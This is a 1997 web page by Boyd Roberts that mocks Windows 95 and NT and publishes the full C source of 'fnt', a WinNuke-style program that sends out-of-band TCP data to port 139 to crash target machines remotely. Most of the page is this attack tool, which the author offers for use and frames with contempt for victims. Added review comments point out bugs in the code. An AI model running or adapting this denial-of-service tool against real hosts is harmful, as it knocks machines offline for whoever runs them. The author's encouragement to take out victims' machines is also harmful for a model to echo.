Microsoft Gets Serious About Networking With Windows '95 and Windows NT

At the bottom of this page you will find the C source to a program that will take out Windows '95 and Windows NT. You don't even have to run it on the target machine (that would be too easy). This program just sends a chunk of out-of-band data to a TCP/IP port (by default NetBIOS port 139) and results in the death of the machine. More precisely, the Blue Screen Of Death [BSOD].

This is just the sort of quality software that we need in the 1990s. Software that allows anyone to take out any number of machines running Windows '95 and Windows NT from any point on the Internet. Let's face it, the idiot who bought it really deserves it anyway. The idiot bought Microsoft. The idiot should pay.

In some quarters there is a twisted belief that Windows NT could or even should be used as a Firewall. Perhaps it should. After it's been crashed I guess it's about as secure a Firewall as you can get. Perhaps I'm just missing the point.



/*
 * fnt host[:port] ...
 *
 * Send a MSG_OOB to a TCP/IP service.
 *
 * Boyd Roberts
 * July 1997
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>

/* Program name prefixed to every diagnostic; main() replaces it with the basename of argv[0]. */
char	*my_name	= "fnt";

/*
 * Report a failed operation on stderr in the form
 *   <prog>: Could not <what> '<with>'. <strerror(errno)>
 *
 * what - verb phrase naming the operation that failed
 * with - the object (here always a host name) it was applied to
 *
 * errno is sampled when this function is entered, so it must be called
 * before any other library call can overwrite it.
 */
void
could_not(char *what, char *with)
{
	char	*reason = strerror(errno);

	fprintf(stderr, "%s: Could not %s '%s'. %s\n", my_name, what, with, reason);
}

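/*
 * A cut down version of inet_aton().  Converts a dotted quad to an IP address.
 *
 * This call is missing from some libc's.
 *
 * s - candidate string; must be exactly four decimal octets, "d.d.d.d"
 * a - receives the address in network byte order on success
 *
 * Returns 1 on success, 0 if s is not a dotted quad.  *a is not written
 * on failure.
 */
int
inet_aton(char *s, struct in_addr *a)
{
	/* %u stores through an unsigned int *, so the octets must be unsigned int. */
	unsigned int	b[4];
	char		trailing;
	int		i;

	/*
	 * Exactly four conversions must succeed: a fifth means there is text
	 * after the last octet ("1.2.3.4x"), which is not a dotted quad.
	 */
	if (sscanf(s, "%3u.%3u.%3u.%3u%c", &b[0], &b[1], &b[2], &b[3], &trailing) != 4)
		return 0;

	/* Three digits can still exceed an octet (e.g. 300). */
	for (i = 0; i < 4; i++)
		if (b[i] > 255)
			return 0;

	a->s_addr = htonl((unsigned long)b[0] << 24 | b[1] << 16 | b[2] << 8 | b[3]);
	return 1;
}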

/*
 * Send the MSG_OOB to a TCP/IP service.
 *
 * host - dotted quad or host name to resolve
 * port - TCP port, already in network byte order (it is stored into
 *        sin_port without conversion)
 *
 * Opens one TCP connection to the first address of host that accepts it,
 * sends 7 bytes flagged MSG_OOB, and closes the socket.
 *
 * Returns 0 if the send and close both succeeded, 1 on any failure (a
 * diagnostic is printed via could_not()).
 *
 * On the wire MSG_OOB is TCP urgent data (URG flag set).  The page
 * attributes the crash to how the receiving Windows '95 / NT machine
 * handles it on port 139; not exposing that port to untrusted networks
 * removes the exposure the page describes.
 */
int
fnt(char *host, unsigned short port)
{
	int			s;
	struct hostent		*h;
	struct in_addr		a;
	struct hostent		he;	/* stand-in hostent for a literal address */
	char			*list[2]; 
	struct sockaddr_in	sin;
	int			i;

	/*
	 * NOTE(review): memchr() only searches the buffer and its result is
	 * discarded, so sin is not cleared here; memset() was presumably
	 * intended.  Fields not assigned below stay uninitialised.
	 */
	memchr(&sin, '\0', sizeof sin);
	sin.sin_family = AF_INET;
	sin.sin_port = port;

	/*
	 * Find host's address(es).
	 *
	 * A literal dotted quad is wrapped in a one-entry, NULL-terminated
	 * address list so the connect loop below handles both cases alike.
	 */
	if (inet_aton(host, &a))
	{
		h = &he;
		h->h_addr_list = list;
		h->h_addr_list[0] = (char *)&a;
		h->h_addr_list[1] = NULL;
	}
	else if ((h = gethostbyname(host)) == NULL)
	{
		/* NOTE(review): gethostbyname() reports failure via h_errno, so the errno text printed here may be unrelated — confirm. */
		could_not("gethostbyname for", host);
		return 1;
	}

	if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
	{
		could_not("create socket to", host);
		return 1;
	}

	/*
	 * Connect to each address in turn.
	 *
	 * The same socket is reused for every attempt.
	 * NOTE(review): whether a socket can be reused after a failed
	 * connect() is platform-dependent — confirm on the target libc.
	 */
	i = 0;

	for (;;)
	{
		/* End of the address list: every address refused the connection. */
		if (h->h_addr_list[i] == NULL)
		{
			could_not("connect to",  host);
			goto clunk;
		}

		sin.sin_addr = *(struct in_addr *)h->h_addr_list[i];

		if (connect(s, (struct sockaddr *)&sin, sizeof sin) != -1)
			break;

		i++;
	}

	/* 7 bytes, no terminating NUL, sent as out-of-band (urgent) data. */
	if (send(s, "hallouf", 7, MSG_OOB) == -1)
	{
		could_not("send to", host);
		goto clunk;
	}

	/* NOTE(review): close() is used without <unistd.h> among the visible includes. */
	if (close(s) != -1)
		return 0;

	could_not("close socket to", host);
	return 1;

	/* Failure path once the socket exists: release it and report failure. */
clunk:
	close(s);
	return 1;
}

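/*
 * Turn a character string into a TCP/IP port.
 *
 * s - decimal port number
 *
 * Returns the port in network byte order, or -1 if s is not a decimal
 * number in the range 1..65535.  The caller treats -1 as "try a service
 * name lookup instead".
 */
long
set_port(char *s)
{
	char	*end;
	long	p;

	p = strtol(s, &end, 10);

	/*
	 * Reject input with no digits, trailing text ("139x"), and values
	 * outside 1..65535.  Negative numbers would otherwise be masked into
	 * an unrelated port.
	 */
	if (end == s || *end != '\0' || p <= 0 || p > 0xFFFFL)
		return -1;

	return htons((unsigned short)p);
}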

/*
 * Print the command synopsis on stderr and terminate the process with
 * exit status 1.  Does not return.
 *
 * The argument form main() actually parses is host[:port]: the colon and
 * port are optional together.
 */
void
usage()
{
	FILE	*out = stderr;

	fprintf(out, "usage: %s host:[port] ...\n", my_name);
	exit(1);
}

/*
 * Entry point: treat each argument as host[:port], resolve the port
 * (numeric, then service name, default 139) and hand the pair to fnt().
 * Exits with e, which is set to 1 when a port is invalid or fnt() fails.
 *
 * NOTE(review): the return type is omitted (implicit int).
 */
main(int argc, char *argv[])
{
	int		i;
	int		e;	/* NOTE(review): never initialised; exit(e) is indeterminate when nothing failed */

	if (argc < 1)
		usage();

	/* Use the basename of argv[0] in diagnostics; fall back to argv[0] if there is no '/' or it ends in one. */
	if ((my_name = strrchr(argv[0], '/')) == NULL || *++my_name == '\0')
		my_name = argv[0];

	if (argc == 1)
		usage();

	for (i = 1; i < argc; i++)
	{
		char		*host;
		long		l;
		unsigned short	port;
		char		*p;

		/* host[:port] */
		/*
		 * NOTE(review): i is advanced here and again by the for header,
		 * so every second argument is skipped.
		 */
		host = argv[i++];

		/*
		 * Split at the first ':' by overwriting it in argv, leaving p at
		 * the port text.  The comparison against '\0' is a null-pointer
		 * test written with a character constant.
		 */
		if ((p = strchr(host, ':')) != '\0')
			*p++ = '\0';
		else
			p = "139";	/* default to port 139 (netbios) */

		/* Not numeric (or out of range): try it as a TCP service name. */
		if ((l = set_port(p)) == -1)
		{
			struct servent	*s;

			if ((s = getservbyname(p, "tcp")) == NULL)
			{
				fprintf(stderr, "%s: '%s' is not a valid port.\n", my_name, p);
				e = 1;
				continue;
			}

			/* s_port is already in network byte order, as fnt() expects. */
			port = s->s_port;
		}
		else
			port = l & 0xFFFFL;	/* set_port() already applied htons() */

		if (fnt(host, port))
			e = 1;
	}

	exit(e);
}


© 1997, Boyd Roberts: boyd@insultant.net